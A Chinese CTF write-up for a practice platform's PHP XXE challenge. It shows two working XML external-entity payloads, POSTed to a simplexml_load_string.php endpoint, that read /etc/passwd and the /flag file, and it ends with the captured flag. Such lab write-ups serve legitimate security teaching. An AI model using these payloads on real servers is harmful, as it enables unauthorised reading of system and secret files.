当前位置: 首页 > article >正文

青少年CTF练习平台 PHP的XXE

article 2025/1/26 17:49:19

访问靶场是个phpinfo()页面

 题目提示是PHP的XXE,访问simplexml_load_string.php文件

get请求是空白,要使用post方法请求

尝试读取文件,读取/etc/passwd文件

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<test>
<name>
&xxe;
</name>
 
</test>

可以读取,直接读取/flag文件

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe [
<!ELEMENT test ANY >
<!ENTITY xxe SYSTEM "file:///flag">
]>
<test>
<name>
&xxe;
</name>
 
</test>

 

拿下

flag{35051fe183054e559276a77062bc0092} 

 


http://www.kler.cn/a/517535.html

相关文章:

  • 寒假1.23
  • VMware虚拟机安装Linux系统(openKylin)
  • 12、MySQL锁相关知识
  • 设计模式的艺术-享元模式
  • OpenEuler学习笔记(八):安装OpenEuler
  • C语言文件操作
  • 【深度学习|迁移学习】渐进式学习策略 (Progressive Learning Strategy)详述(一)
  • vulnhub 靶场 —— MrRobot
  • 星火大模型接入及文本生成HTTP流式、非流式接口(JAVA)
  • 【深度学习基础】多层感知机 | 数值稳定性和模型初始化
  • 软件开发学习路线——roadmap
  • java.io包中StringWriter类和PrintWriter类作用
  • 上海亚商投顾:沪指冲高回落 大金融板块全天强势 上海亚商投
  • rust学习-rust中的保留字
  • python编写Socket程序
  • vue3表格数据分2个表格序号连续展示
  • 基于亿坊PHP框架构建物联网解决方案的优势分析!
  • 【QT】- QThread类介绍和线程的创建
  • 「 机器人 」扑翼飞行器的数据驱动建模核心方法
  • Django基础之ORM
  • arm-linux平台、rk3288 SDL移植
  • (算法竞赛)使用广度优先搜索(BFS)解决迷宫最短路径问题
  • 14.杂谈:领域知识库与知识图谱:概念、关系与重要性
  • 虚拟头节点和双指针解决链表问题(合并,与分解操作,力扣题目为例)
  • 微信小程序date picker的一些说明
  • C++实现设计模式---职责链模式 (Chain of Responsibility)